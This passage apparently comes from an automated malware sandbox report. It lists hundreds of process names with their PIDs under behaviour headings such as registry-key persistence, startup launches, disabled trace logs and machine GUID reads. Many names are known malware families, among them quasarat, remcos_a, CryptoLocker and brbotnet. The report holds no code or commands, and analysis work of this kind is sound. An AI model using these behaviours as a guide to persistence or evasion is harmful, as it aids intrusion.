      • shell.exe (PID: 19672)
      • Test5.exe (PID: 19220)
      • TestMemTest38.exe (PID: 19244)
      • server.exe (PID: 20288)
      • TestMemTest14.exe (PID: 19400)
      • aaa%20(3).exe (PID: 20312)
      • aaa%20(3).exe (PID: 20028)
      • 1.exe (PID: 19960)
      • pe2shc.exe (PID: 18488)
      • DumpAADUserPRT.exe (PID: 20036)
      • sys.exe (PID: 19428)
      • Doppelganger.exe (PID: 8884)
      • WxWorkMultiOpen.exe (PID: 1160)
      • TestMemTest10.exe (PID: 18648)
      • brbotnet.exe (PID: 20020)
      • WxWorkMultiOpen.exe (PID: 20304)
      • tomcat8.exe (PID: 19260)
      • {34184A33-0407-212E-3300-09040709E2C2}.exe (PID: 21464)
      • cvtres.exe (PID: 21384)
      • 90.exe (PID: 21332)
      • NetWindowsUpdate.exe (PID: 18560)
      • Axam.exe (PID: 20588)
      • s.exe (PID: 6736)
      • Axam.exe (PID: 21476)
      • Axam.exe (PID: 19336)
      • bot.exe (PID: 16916)
      • Ganja99.exe (PID: 13580)
      • {34184A33-0407-212E-3300-09040709E2C2}.exe (PID: 21516)
      • Install.exe (PID: 21560)
      • rea.exe (PID: 21832)
      • ddosziller.exe (PID: 22080)
      • csc.exe (PID: 19544)
      • izlkpmmnuf.exe (PID: 21840)
      • svhost.exe (PID: 13596)
      • Axam.exe (PID: 20232)
      • Axam.exe (PID: 14876)
      • Cloudy.exe (PID: 18636)
      • epic.exe (PID: 22456)
      • Server1.exe (PID: 21020)
      • Ganja168.exe (PID: 22224)
      • Axam.exe (PID: 15212)
      • Axam.exe (PID: 12752)
      • Axam.exe (PID: 12860)
      • Axam.exe (PID: 18644)
      • Axam.exe (PID: 21212)
      • Axam.exe (PID: 5600)
      • Axam.exe (PID: 22412)
      • Axam.exe (PID: 15368)
      • Axam.exe (PID: 14268)
      • Axam.exe (PID: 15600)
      • Axam.exe (PID: 20004)
      • Axam.exe (PID: 13480)
      • Axam.exe (PID: 18840)
      • Launcher_Start.exe (PID: 19660)
      • jajajdva.exe (PID: 14372)
      • cvtres.exe (PID: 5728)
      • csc.exe (PID: 17268)
      • Axam.exe (PID: 6336)
      • RegSvcs.exe (PID: 7928)
      • vbc.exe (PID: 10184)
      • csc.exe (PID: 7272)
      • cvtres.exe (PID: 7608)
      • chcp.com (PID: 7988)
      • TextInputHost.exe (PID: 8296)
      • cvtres.exe (PID: 16920)
      • Axam.exe (PID: 9000)
      • Axam.exe (PID: 8540)
      • csc.exe (PID: 8664)
      • Axam.exe (PID: 8520)
      • csc.exe (PID: 9500)
      • cvtres.exe (PID: 14468)
      • csc.exe (PID: 12792)
      • cvtres.exe (PID: 11044)
      • Axam.exe (PID: 17912)
      • Axam.exe (PID: 21768)
      • bindsvc.exe (PID: 8600)
      • c0917a8dtcp.exe (PID: 9112)
      • quasarat.exe (PID: 8300)
      • Axam.exe (PID: 12048)
      • Axam.exe (PID: 11700)
      • csc.exe (PID: 22192)
      • cvtres.exe (PID: 7636)
      • csc.exe (PID: 9388)
      • cvtres.exe (PID: 10268)
      • Axam.exe (PID: 12364)
      • csc.exe (PID: 22240)
      • csc.exe (PID: 12832)
      • cvtres.exe (PID: 18500)
      • csc.exe (PID: 5560)
      • cvtres.exe (PID: 14516)
      • Axam.exe (PID: 20124)
      • chcp.com (PID: 15492)
      • cvtres.exe (PID: 9456)
      • Axam.exe (PID: 2064)
      • csc.exe (PID: 17680)
      • Axam.exe (PID: 14468)
      • csc.exe (PID: 8548)
      • csc.exe (PID: 7276)
      • cvtres.exe (PID: 7200)
      • cvtres.exe (PID: 11484)
      • cvtres.exe (PID: 13372)
      • csc.exe (PID: 18828)
      • cvtres.exe (PID: 4548)
      • cvtres.exe (PID: 18444)
      • csc.exe (PID: 17744)
      • Axam.exe (PID: 22376)
      • quasarat.exe (PID: 19208)
      • client.exe (PID: 21268)
      • Axam.exe (PID: 22052)
      • updater.exe (PID: 11388)
      • Axam.exe (PID: 20468)
      • msedge.exe (PID: 6244)
      • Axam.exe (PID: 17632)
      • ksoftriqd.exe (PID: 16708)
      • Axam.exe (PID: 16716)
      • chcp.com (PID: 13320)
      • Axam.exe (PID: 12456)
      • quasarat.exe (PID: 18260)
      • chcp.com (PID: 13776)
    • Create files in a temporary directory

      • main.exe (PID: 424)
      • main.exe (PID: 4984)
      • build.exe (PID: 7768)
      • Helper.exe (PID: 8064)
      • Setup.exe (PID: 10864)
      • Mm5njCjtExPunNp1j.exe (PID: 8208)
      • Axam.a.exe (PID: 11836)
      • Amus.exe (PID: 11992)
      • Bugsoft.exe (PID: 11860)
      • donie30.exe (PID: 7712)
      • Prolin.exe (PID: 12124)
      • msconfig.exe (PID: 13112)
      • Test7.exe (PID: 9796)
      • %D0%A4%D0%BE%D1%80%D0%BC%D0%B0%203%D0%9E%D0%A8%D0%91%D0%A0.exe (PID: 11812)
      • your_app.exe (PID: 7460)
      • Axam.exe (PID: 15596)
      • Axam.exe (PID: 9756)
      • Axam.exe (PID: 13504)
      • vshell.exe (PID: 16516)
      • Vb5HUIU.exe (PID: 7208)
      • remcos_a.exe (PID: 16540)
      • Installer.exe (PID: 3048)
      • dumer.exe (PID: 16944)
      • f.exe (PID: 10468)
      • MSBuild.exe (PID: 13880)
      • mofcomp.exe (PID: 1964)
      • test.exe (PID: 17144)
      • csc.exe (PID: 14272)
      • Axam.exe (PID: 9232)
      • cvtres.exe (PID: 12648)
      • Axam.exe (PID: 12528)
      • csc.exe (PID: 7016)
      • cvtres.exe (PID: 13832)
      • Axam.exe (PID: 14556)
      • powershell.exe (PID: 17392)
      • Axam.exe (PID: 6820)
      • Axam.exe (PID: 13304)
      • powershell.exe (PID: 15668)
      • Axam.exe (PID: 13836)
      • CvWizardV2.exe (PID: 11916)
      • Axam.exe (PID: 4888)
      • werefult.exe (PID: 10168)
      • powershell.exe (PID: 4936)
      • Axam.exe (PID: 16296)
      • powershell.exe (PID: 12636)
      • Launcher_Start.exe (PID: 18420)
      • cvtres.exe (PID: 6776)
      • Axam.exe (PID: 17832)
      • csc.exe (PID: 17716)
      • powershell.exe (PID: 17712)
      • 6.exe (PID: 13616)
      • Axam.exe (PID: 14480)
      • discord.exe (PID: 12704)
      • ultralinvitepart.exe (PID: 17064)
      • pst.exe (PID: 18556)
      • Axam.exe (PID: 19076)
      • Pack_Autre_ncrypt.exe (PID: 17004)
      • catqw.exe (PID: 18632)
      • TestWindow.exe (PID: 18440)
      • downloader.exe (PID: 14092)
      • FXServer.exe (PID: 18776)
      • Pack_Brout_ncrypt.exe (PID: 20152)
      • cabal.exe (PID: 3972)
      • csc.exe (PID: 17940)
      • catee.exe (PID: 19996)
      • cvtres.exe (PID: 21384)
      • Axam.exe (PID: 20588)
      • Axam.exe (PID: 19336)
      • Axam.exe (PID: 21476)
      • sys.exe (PID: 19428)
      • powershell.exe (PID: 19180)
      • brbotnet.exe (PID: 20020)
      • quasarat.exe (PID: 18452)
      • Axam.exe (PID: 14876)
      • Server1.exe (PID: 21020)
      • 4.exe (PID: 6704)
      • ap.exe (PID: 18040)
      • Axam.exe (PID: 22412)
      • Axam.exe (PID: 12860)
      • Axam.exe (PID: 21212)
      • Axam.exe (PID: 5600)
      • Axam.exe (PID: 20232)
      • Axam.exe (PID: 15212)
      • Axam.exe (PID: 14268)
      • Axam.exe (PID: 18644)
      • Axam.exe (PID: 15368)
      • Axam.exe (PID: 12752)
      • Axam.exe (PID: 13480)
      • csc.exe (PID: 19544)
      • Axam.exe (PID: 20004)
      • Axam.exe (PID: 18840)
      • BootstrapperNew.exe (PID: 19928)
      • BootstrapperNew.exe (PID: 15140)
      • cvtres.exe (PID: 5728)
      • BootstrapperNew.exe (PID: 16672)
      • powershell.exe (PID: 22196)
      • Launcher_Start.exe (PID: 19660)
      • powershell.exe (PID: 22244)
      • csc.exe (PID: 17268)
      • Axam.exe (PID: 6336)
      • cvtres.exe (PID: 7608)
      • powershell.exe (PID: 5844)
      • csc.exe (PID: 7272)
      • msiexec.exe (PID: 19532)
      • cvtres.exe (PID: 16920)
      • Axam.exe (PID: 8540)
      • powershell.exe (PID: 18180)
      • Axam.exe (PID: 9000)
      • Axam.exe (PID: 8520)
      • cvtres.exe (PID: 11044)
      • powershell.exe (PID: 11360)
      • Axam.exe (PID: 17912)
      • Axam.exe (PID: 21768)
      • izlkpmmnuf.exe (PID: 21840)
      • powershell.exe (PID: 4088)
      • cvtres.exe (PID: 7636)
      • csc.exe (PID: 9388)
      • csc.exe (PID: 22192)
      • cvtres.exe (PID: 10268)
      • quasarat.exe (PID: 8300)
      • Axam.exe (PID: 12364)
      • windows.exe (PID: 19468)
      • csc.exe (PID: 12832)
      • csc.exe (PID: 22240)
      • cvtres.exe (PID: 18500)
      • cvtres.exe (PID: 14516)
      • csc.exe (PID: 5560)
      • Axam.exe (PID: 20124)
      • powershell.exe (PID: 10156)
      • powershell.exe (PID: 18740)
      • Terminal_9235.exe (PID: 20464)
      • Axam.exe (PID: 2064)
      • Axam.exe (PID: 14468)
      • csc.exe (PID: 7276)
      • csc.exe (PID: 8548)
      • cvtres.exe (PID: 13372)
      • cvtres.exe (PID: 11484)
      • csc.exe (PID: 17680)
      • powershell.exe (PID: 15712)
      • csc.exe (PID: 18828)
      • csc.exe (PID: 17744)
      • Axam.exe (PID: 22052)
      • quasarat.exe (PID: 19208)
      • Axam.exe (PID: 20468)
      • msedge.exe (PID: 6244)
      • Axam.exe (PID: 17632)
      • Axam.exe (PID: 16716)
      • Axam.exe (PID: 12456)
      • quasarat.exe (PID: 18260)
    • Checks proxy server information

      • main.exe (PID: 424)
      • sFFG7Wg.exe (PID: 7616)
      • Vb5HUIU.exe (PID: 7208)
      • L2.exe (PID: 11788)
      • baboon.exe (PID: 11748)
      • MSBuild.exe (PID: 13880)
      • svchost.exe (PID: 14416)
      • installs.exe (PID: 7728)
      • dumer.exe (PID: 16944)
      • Jay.exe (PID: 12012)
      • test.exe (PID: 17144)
      • build.exe (PID: 7768)
      • powershell.exe (PID: 12208)
      • powershell.exe (PID: 12408)
      • powershell.exe (PID: 9652)
      • powershell.exe (PID: 11064)
      • WerFault.exe (PID: 15168)
      • WerFault.exe (PID: 15136)
      • powershell.exe (PID: 15236)
      • powershell.exe (PID: 11028)
      • WerFault.exe (PID: 15564)
      • Launcher_Start.exe (PID: 18420)
      • powershell.exe (PID: 12432)
      • march.exe (PID: 18272)
      • demon.exe (PID: 17732)
      • demonx64.exe (PID: 11000)
      • https.exe (PID: 19424)
      • c2_payload_aes.exe (PID: 13536)
      • slui.exe (PID: 6344)
      • audi.exe (PID: 19496)
      • rundll32.exe (PID: 21456)
      • test.exe (PID: 19952)
      • Ganja128.exe (PID: 18676)
      • quasarat.exe (PID: 18452)
      • Cloudy.exe (PID: 9416)
      • Ganja61.exe (PID: 13160)
      • ganja5.exe (PID: 18576)
      • Ganja151.exe (PID: 19512)
      • s.exe (PID: 15748)
      • Launcher_Start.exe (PID: 19660)
      • bot.exe (PID: 16916)
      • powershell.exe (PID: 11868)
      • RegSvcs.exe (PID: 7928)
      • vbc.exe (PID: 10184)
      • powershell.exe (PID: 10108)
      • certutil.exe (PID: 9608)
      • WerFault.exe (PID: 7880)
      • WerFault.exe (PID: 5952)
      • powershell.exe (PID: 8620)
      • WerFault.exe (PID: 16496)
      • quasarat.exe (PID: 8300)
      • quasarat.exe (PID: 19208)
      • powershell.exe (PID: 17468)
      • quasarat.exe (PID: 18260)
      • WerFault.exe (PID: 6064)
    • Reads security settings of Internet Explorer

      • Taskmgr.exe (PID: 1936)
      • svchost.exe (PID: 14416)
      • explorer.exe (PID: 4772)
      • powershell.exe (PID: 17392)
      • powershell.exe (PID: 15668)
      • powershell.exe (PID: 4936)
      • powershell.exe (PID: 12636)
      • powershell.exe (PID: 17712)
      • rundll32.exe (PID: 21456)
      • powershell.exe (PID: 19180)
      • WMIC.exe (PID: 21616)
      • powershell.exe (PID: 22196)
      • powershell.exe (PID: 22244)
      • WMIC.exe (PID: 536)
      • WMIC.exe (PID: 13668)
      • powershell.exe (PID: 5844)
      • powershell.exe (PID: 18180)
      • WMIC.exe (PID: 11300)
      • powershell.exe (PID: 10156)
      • powershell.exe (PID: 11360)
      • certutil.exe (PID: 9608)
      • powershell.exe (PID: 18740)
      • powershell.exe (PID: 4088)
      • powershell.exe (PID: 15712)
    • The sample compiled with english language support

      • main.exe (PID: 4984)
      • main.exe (PID: 424)
      • Setup.exe (PID: 10864)
      • Prolin.exe (PID: 12124)
      • 123.exe (PID: 9176)
      • Axam.a.exe (PID: 11836)
      • Amus.exe (PID: 11992)
      • Installer.exe (PID: 3048)
      • test.exe (PID: 17144)
      • dumer.exe (PID: 16944)
      • Launcher_Start.exe (PID: 18420)
      • release.exe (PID: 19164)
      • cabal.exe (PID: 3972)
      • izlkpmmnuf.exe (PID: 21840)
      • 4.exe (PID: 6704)
      • OUTLOOK.EXE (PID: 13960)
      • powershell.exe (PID: 11868)
      • msedge.exe (PID: 6244)
      • FileCoAuth.exe (PID: 9348)
    • Reads Internet Explorer settings

      • mshta.exe (PID: 4684)
      • mshta.exe (PID: 1132)
      • mshta.exe (PID: 1136)
      • mshta.exe (PID: 7388)
      • mshta.exe (PID: 2132)
      • mshta.exe (PID: 1192)
      • mshta.exe (PID: 2160)
      • mshta.exe (PID: 9412)
      • mshta.exe (PID: 9468)
      • mshta.exe (PID: 9476)
      • mshta.exe (PID: 11216)
      • mshta.exe (PID: 13948)
      • mshta.exe (PID: 19944)
      • mshta.exe (PID: 20052)
      • mshta.exe (PID: 20044)
    • Creates files in the program directory

      • mY1SRsZ.exe (PID: 4920)
      • Ganja90.exe (PID: 11748)
      • Ganja113.exe (PID: 11780)
      • kajmak.exe (PID: 11924)
      • MSBuild.exe (PID: 13880)
      • remcos_a.exe (PID: 16540)
      • FXServer.exe (PID: 18776)
      • release.exe (PID: 19164)
      • audi.exe (PID: 19496)
      • svhost.exe (PID: 13596)
      • Ganja128.exe (PID: 18676)
      • bot.exe (PID: 16916)
      • BootstrapperNew.exe (PID: 20212)
      • BootstrapperNew.exe (PID: 15140)
      • Server1.exe (PID: 21020)
      • SearchIndexer.exe (PID: 8392)
      • windows.exe (PID: 19468)
    • Reads the machine GUID from the registry

      • mY1SRsZ.exe (PID: 4920)
      • Vb5HUIU.exe (PID: 7208)
      • build.exe (PID: 7768)
      • swagggg.exe (PID: 7696)
      • Helper.exe (PID: 8064)
      • 4eTHv9F.exe (PID: 8860)
      • L2.exe (PID: 11788)
      • installs.exe (PID: 7728)
      • XClient.exe (PID: 7736)
      • Jay.exe (PID: 12012)
      • javaw.exe (PID: 12000)
      • dp.exe (PID: 11892)
      • Amus.exe (PID: 11992)
      • Clien123.exe (PID: 10712)
      • CvWizardV2.exe (PID: 11916)
      • CryptoWall.exe (PID: 14204)
      • foncar.exe (PID: 14284)
      • discord.exe (PID: 12704)
      • MSBuild.exe (PID: 14256)
      • MSBuild.exe (PID: 13880)
      • Crypt.exe (PID: 12284)
      • test.exe (PID: 17144)
      • csc.exe (PID: 14272)
      • csc.exe (PID: 7016)
      • csc.exe (PID: 17716)
      • Launcher_Start.exe (PID: 18420)
      • CvWizardV2.exe (PID: 17508)
      • Cloudy.exe (PID: 9416)
      • ap.exe (PID: 18040)
      • AddMeFast%20Bot.exe (PID: 18200)
      • LOIC.exe (PID: 18172)
      • ultralinvitepart.exe (PID: 17064)
      • BootstrapperNew.exe (PID: 18192)
      • quasarat.exe (PID: 18452)
      • csc.exe (PID: 17940)
      • msedge.exe (PID: 17824)
      • s.exe (PID: 15748)
      • BootstrapperNew.exe (PID: 15140)
      • BootstrapperNew.exe (PID: 16672)
      • c2_payload_aes.exe (PID: 13536)
      • BootstrapperNew.exe (PID: 19928)
      • BootstrapperNew.exe (PID: 20212)
      • Client-built.exe (PID: 20060)
      • Client-built.exe (PID: 20204)
      • test.exe (PID: 19952)
      • 90.exe (PID: 19172)
      • Network.exe (PID: 19688)
      • cc.exe (PID: 19988)
      • AsyncClient.exe (PID: 19936)
      • AsyncClient.exe (PID: 20220)
      • Ganja61.exe (PID: 13160)
      • Terminal_9235.exe (PID: 20464)
      • windriver.exe (PID: 19680)
      • Ganja151.exe (PID: 19512)
      • Ganja128.exe (PID: 18676)
      • aaa%20(3).exe (PID: 20312)
      • ganja5.exe (PID: 18576)
      • aaa%20(3).exe (PID: 20028)
      • {34184A33-0407-212E-3300-09040709E2C2}.exe (PID: 21464)
      • dumer.exe (PID: 16944)
      • brbotnet.exe (PID: 20020)
      • Install.exe (PID: 21560)
      • ddosziller.exe (PID: 22080)
      • SWID_reader.exe (PID: 20012)
      • s.exe (PID: 6736)
      • epic.exe (PID: 22456)
      • csc.exe (PID: 19544)
      • Cloudy.exe (PID: 18636)
      • Launcher_Start.exe (PID: 19660)
      • bot.exe (PID: 16916)
      • csc.exe (PID: 17268)
      • RegSvcs.exe (PID: 7928)
      • csc.exe (PID: 7272)
      • vbc.exe (PID: 10184)
      • csc.exe (PID: 9108)
      • csc.exe (PID: 9500)
      • Fast%20Download.exe (PID: 20296)
      • csc.exe (PID: 12792)
      • quasarat.exe (PID: 8300)
      • csc.exe (PID: 22192)
      • csc.exe (PID: 9388)
      • csc.exe (PID: 12832)
      • csc.exe (PID: 22240)
      • csc.exe (PID: 5560)
      • csc.exe (PID: 8548)
      • csc.exe (PID: 7276)
      • csc.exe (PID: 17680)
      • csc.exe (PID: 17744)
      • csc.exe (PID: 18828)
      • quasarat.exe (PID: 19208)
      • client.exe (PID: 21268)
      • quasarat.exe (PID: 18260)
    • Reads Environment values

      • swagggg.exe (PID: 7696)
      • Vb5HUIU.exe (PID: 7208)
      • runtimebroker.exe (PID: 10248)
      • WindowsUpdateLauncher.exe (PID: 10660)
      • javaw.exe (PID: 12000)
      • Helper.exe (PID: 8064)
      • 4eTHv9F.exe (PID: 8860)
      • build.exe (PID: 7768)
      • installs.exe (PID: 7728)
      • MSBuild.exe (PID: 13880)
      • test.exe (PID: 17144)
      • Launcher_Start.exe (PID: 18420)
      • Client-built.exe (PID: 20060)
      • Client-built.exe (PID: 20204)
      • test.exe (PID: 19952)
      • Network.exe (PID: 19688)
      • Ganja128.exe (PID: 18676)
      • Cloudy.exe (PID: 9416)
      • s.exe (PID: 15748)
      • bot.exe (PID: 16916)
      • Launcher_Start.exe (PID: 19660)
    • Reads mouse settings

      • Mm5njCjtExPunNp1j.exe (PID: 8208)
      • catqw.exe (PID: 18632)
      • catee.exe (PID: 19996)
    • Disables trace logs

      • Vb5HUIU.exe (PID: 7208)
      • installs.exe (PID: 7728)
      • Jay.exe (PID: 12012)
      • test.exe (PID: 17144)
      • powershell.exe (PID: 12208)
      • powershell.exe (PID: 12408)
      • build.exe (PID: 7768)
      • powershell.exe (PID: 9652)
      • powershell.exe (PID: 11064)
      • powershell.exe (PID: 15236)
      • powershell.exe (PID: 11028)
      • Launcher_Start.exe (PID: 18420)
      • powershell.exe (PID: 12432)
      • test.exe (PID: 19952)
      • ganja5.exe (PID: 18576)
      • Ganja61.exe (PID: 13160)
      • Ganja128.exe (PID: 18676)
      • quasarat.exe (PID: 18452)
      • Cloudy.exe (PID: 9416)
      • s.exe (PID: 15748)
      • Launcher_Start.exe (PID: 19660)
      • powershell.exe (PID: 11868)
      • bot.exe (PID: 16916)
      • RegSvcs.exe (PID: 7928)
      • vbc.exe (PID: 10184)
      • powershell.exe (PID: 10108)
      • powershell.exe (PID: 8620)
      • quasarat.exe (PID: 8300)
      • quasarat.exe (PID: 19208)
      • powershell.exe (PID: 17468)
      • quasarat.exe (PID: 18260)
    • Creates files or folders in the user directory

      • runtimebroker.exe (PID: 10248)
      • syspool.exe (PID: 9884)
      • lol.exe (PID: 11820)
      • f.exe (PID: 10468)
      • Taskmgr.exe (PID: 1936)
      • Ganja132.exe (PID: 11036)
      • Amus.exe (PID: 11992)
      • swagggg.exe (PID: 7696)
      • explorer.exe (PID: 14264)
      • 123.exe (PID: 9176)
      • Bloxflip%20Predictor.exe (PID: 12768)
      • Axam.a.exe (PID: 11836)
      • explorer.exe (PID: 4772)
      • MSBuild.exe (PID: 13880)
      • Vb5HUIU.exe (PID: 7208)
      • dumer.exe (PID: 16944)
      • WerFault.exe (PID: 15136)
      • WerFault.exe (PID: 15168)
      • CvWizardV2.exe (PID: 11916)
      • WerFault.exe (PID: 15564)
      • 6.exe (PID: 13616)
      • discord.exe (PID: 12704)
      • CryptoLocker.exe (PID: 19476)
      • Network.exe (PID: 19688)
      • windriver.exe (PID: 19680)
      • Client-built.exe (PID: 20204)
      • 444.exe (PID: 20168)
      • audi.exe (PID: 19496)
      • ap.exe (PID: 18040)
      • installer.exe (PID: 10492)
      • Cloudy.exe (PID: 9416)
      • jajajdva.exe (PID: 14372)
      • certutil.exe (PID: 9608)
      • WerFault.exe (PID: 5952)
      • bindsvc.exe (PID: 8600)
      • WerFault.exe (PID: 7880)
      • WerFault.exe (PID: 16496)
      • Terminal_9235.exe (PID: 20464)
      • WerFault.exe (PID: 6064)
    • Launching a file from a Registry key

      • runtimebroker.exe (PID: 10248)
      • syspool.exe (PID: 9884)
      • WindowsUpdateLauncher.exe (PID: 10660)
      • loader.exe (PID: 12116)
      • Ganja85.exe (PID: 11764)
      • winsvchost.exe (PID: 12808)
      • msconfig.exe (PID: 13112)
      • Ganja36.exe (PID: 11932)
      • explorer.exe (PID: 14264)
      • Axam.a.exe (PID: 11836)
      • Amus.exe (PID: 11992)
      • AdobeART.exe (PID: 15552)
      • Bloxflip%20Predictor.exe (PID: 12768)
      • Axam.exe (PID: 15596)
      • Axam.exe (PID: 9756)
      • Axam.exe (PID: 13504)
      • remcos_a.exe (PID: 16540)
      • Axam.exe (PID: 9232)
      • reg.exe (PID: 16640)
      • Axam.exe (PID: 12528)
      • Axam.exe (PID: 14556)
      • Axam.exe (PID: 6820)
      • Axam.exe (PID: 13304)
      • reg.exe (PID: 17140)
      • Axam.exe (PID: 13836)
      • Axam.exe (PID: 16296)
      • Axam.exe (PID: 4888)
      • werefult.exe (PID: 10168)
      • Axam.exe (PID: 17832)
      • 6.exe (PID: 13616)
      • FXServer.exe (PID: 18776)
      • Axam.exe (PID: 19076)
      • Axam.exe (PID: 14480)
      • 90.exe (PID: 21332)
      • audiodg.exe (PID: 18956)
      • windriver.exe (PID: 19680)
      • {34184A33-0407-212E-3300-09040709E2C2}.exe (PID: 21464)
      • quasarat.exe (PID: 18452)
      • Axam.exe (PID: 19336)
      • Axam.exe (PID: 20588)
      • Axam.exe (PID: 21476)
      • Axam.exe (PID: 14876)
      • installer.exe (PID: 10492)
      • Axam.exe (PID: 13480)
      • Axam.exe (PID: 22412)
      • Axam.exe (PID: 21212)
      • Axam.exe (PID: 5600)
      • Axam.exe (PID: 12752)
      • Axam.exe (PID: 18644)
      • Axam.exe (PID: 14268)
      • Axam.exe (PID: 20232)
      • Axam.exe (PID: 15212)
      • Axam.exe (PID: 12860)
      • Axam.exe (PID: 15600)
      • Axam.exe (PID: 18840)
      • Axam.exe (PID: 15368)
      • Axam.exe (PID: 20004)
      • Server1.exe (PID: 21020)
      • Axam.exe (PID: 6336)
      • server.exe (PID: 20288)
      • Axam.exe (PID: 17912)
      • reg.exe (PID: 6228)
      • Axam.exe (PID: 21768)
      • Axam.exe (PID: 12048)
      • Axam.exe (PID: 11700)
      • reg.exe (PID: 10452)
      • quasarat.exe (PID: 8300)
      • Axam.exe (PID: 12364)
      • Axam.exe (PID: 20124)
      • dumer.exe (PID: 16944)
      • Axam.exe (PID: 14468)
      • Axam.exe (PID: 2064)
      • Axam.exe (PID: 22376)
      • Axam.exe (PID: 22052)
      • quasarat.exe (PID: 19208)
      • reg.exe (PID: 1336)
      • reg.exe (PID: 9044)
      • Axam.exe (PID: 20468)
      • Axam.exe (PID: 17632)
      • Axam.exe (PID: 16716)
      • Axam.exe (PID: 12456)
      • reg.exe (PID: 1176)
      • reg.exe (PID: 6900)
      • quasarat.exe (PID: 18260)
      • reg.exe (PID: 10760)
    • The sample compiled with polish language support

      • main.exe (PID: 424)
    • The sample compiled with chinese language support

      • main.exe (PID: 424)
      • yc.exe (PID: 19448)
      • audi.exe (PID: 19496)
      • 4.exe (PID: 6704)
    • PyInstaller has been detected (YARA)

      • main.exe (PID: 4984)
      • main.exe (PID: 424)
    • Launching a file from the Startup directory

      • explorer.exe (PID: 14264)
      • Bloxflip%20Predictor.exe (PID: 12768)
      • Axam.a.exe (PID: 11836)
      • Fast%20Download.exe (PID: 19488)
      • bot.exe (PID: 16916)
      • Cloudy.exe (PID: 9416)
      • Setup.exe (PID: 10864)
    • Process checks computer location settings

      • donie30.exe (PID: 7712)
      • lol.exe (PID: 11820)
      • Setup.exe (PID: 10864)
      • %D0%A4%D0%BE%D1%80%D0%BC%D0%B0%203%D0%9E%D0%A8%D0%91%D0%A0.exe (PID: 11812)
      • 123.exe (PID: 9176)
      • Bloxflip%20Predictor.exe (PID: 12768)
      • your_app.exe (PID: 7460)
      • Crypt.exe (PID: 12284)
      • remcos_a.exe (PID: 16540)
      • dumer.exe (PID: 16944)
      • CvWizardV2.exe (PID: 11916)
      • discord.exe (PID: 12704)
      • msedge.exe (PID: 17824)
      • Pack_Brout_ncrypt.exe (PID: 20152)
      • downloader.exe (PID: 14092)
      • Pack_Autre_ncrypt.exe (PID: 17004)
      • cabal.exe (PID: 3972)
      • FXServer.exe (PID: 18776)
      • ultralinvitepart.exe (PID: 17064)
      • audi.exe (PID: 19496)
      • 444.exe (PID: 20168)
      • yc.exe (PID: 19448)
      • quasarat.exe (PID: 18452)
      • ap.exe (PID: 18040)
      • 4.exe (PID: 6704)
      • Ganja128.exe (PID: 18676)
      • Server1.exe (PID: 21020)
      • s.exe (PID: 15748)
      • quasarat.exe (PID: 8300)
      • Terminal_9235.exe (PID: 20464)
      • Vb5HUIU.exe (PID: 7208)
      • quasarat.exe (PID: 19208)
      • msedge.exe (PID: 6244)
      • FileCoAuth.exe (PID: 9348)
      • quasarat.exe (PID: 18260)
    • Reads the software policy settings

      • Vb5HUIU.exe (PID: 7208)
      • MSBuild.exe (PID: 13880)
      • MSBuild.exe (PID: 14256)
      • foncar.exe (PID: 14284)
      • test.exe (PID: 17144)
      • powershell.exe (PID: 17392)
      • WerFault.exe (PID: 15168)
      • WerFault.exe (PID: 15136)
      • Helper.exe (PID: 8064)
      • powershell.exe (PID: 15668)
      • powershell.exe (PID: 4936)
      • powershell.exe (PID: 12636)
      • WerFault.exe (PID: 15564)
      • Launcher_Start.exe (PID: 18420)
      • powershell.exe (PID: 17712)
      • rundll32.exe (PID: 21456)
      • powershell.exe (PID: 19180)
      • slui.exe (PID: 6344)
      • dumer.exe (PID: 16944)
      • test.exe (PID: 19952)
      • powershell.exe (PID: 22244)
      • powershell.exe (PID: 5844)
      • powershell.exe (PID: 22196)
      • Launcher_Start.exe (PID: 19660)
      • powershell.exe (PID: 18180)
      • RegSvcs.exe (PID: 7928)
      • vbc.exe (PID: 10184)
      • powershell.exe (PID: 11360)
      • WerFault.exe (PID: 5952)
      • powershell.exe (PID: 18740)
      • WerFault.exe (PID: 7880)
      • powershell.exe (PID: 4088)
      • powershell.exe (PID: 15712)
      • WerFault.exe (PID: 16496)
      • WerFault.exe (PID: 6064)
    • The sample compiled with korean language support

      • main.exe (PID: 424)
      • Launcher_Start.exe (PID: 18420)
    • The sample compiled with turkish language support

      • main.exe (PID: 424)
      • audi.exe (PID: 19496)
      • Server1.exe (PID: 21020)
    • The sample compiled with Italian language support

      • main.exe (PID: 424)
    • Reads product name

      • MSBuild.exe (PID: 13880)
    • Reads CPU info

      • MSBuild.exe (PID: 13880)
      • Ganja128.exe (PID: 18676)
      • Ganja61.exe (PID: 13160)
      • ganja5.exe (PID: 18576)
      • Ganja151.exe (PID: 19512)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 8836)
      • powershell.exe (PID: 12876)
      • powershell.exe (PID: 9652)
      • powershell.exe (PID: 11828)
      • build.exe (PID: 7768)
      • powershell.exe (PID: 11868)
      • powershell.exe (PID: 12268)
      • powershell.exe (PID: 12408)
      • powershell.exe (PID: 11064)
      • powershell.exe (PID: 10108)
      • powershell.exe (PID: 12432)
    • Checks whether the specified file exists (POWERSHELL)

      • Helper.exe (PID: 8064)
      • powershell.exe (PID: 11884)
      • powershell.exe (PID: 11868)
      • powershell.exe (PID: 12432)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 10980)
      • powershell.exe (PID: 11028)
      • powershell.exe (PID: 9652)
      • powershell.exe (PID: 11064)
      • powershell.exe (PID: 12208)
      • powershell.exe (PID: 4012)
      • powershell.exe (PID: 188)
      • powershell.exe (PID: 17392)
      • powershell.exe (PID: 15668)
      • powershell.exe (PID: 11868)
      • powershell.exe (PID: 4936)
      • powershell.exe (PID: 12636)
      • powershell.exe (PID: 17812)
      • powershell.exe (PID: 17712)
      • powershell.exe (PID: 15432)
      • powershell.exe (PID: 19180)
      • powershell.exe (PID: 12408)
      • powershell.exe (PID: 22244)
      • powershell.exe (PID: 22196)
      • powershell.exe (PID: 5844)
      • powershell.exe (PID: 12268)
      • powershell.exe (PID: 18180)
      • powershell.exe (PID: 15888)
      • powershell.exe (PID: 10156)
      • powershell.exe (PID: 8620)
      • powershell.exe (PID: 11360)
      • powershell.exe (PID: 18740)
      • powershell.exe (PID: 8144)
      • powershell.exe (PID: 4088)
      • powershell.exe (PID: 15712)
      • powershell.exe (PID: 21604)
      • powershell.exe (PID: 17468)
    • Gets a random number, or selects objects randomly from a collection (POWERSHELL)

      • powershell.exe (PID: 8836)
    • Application launched itself

      • chrome.exe (PID: 4816)
      • chrome.exe (PID: 13168)
      • chrome.exe (PID: 13952)
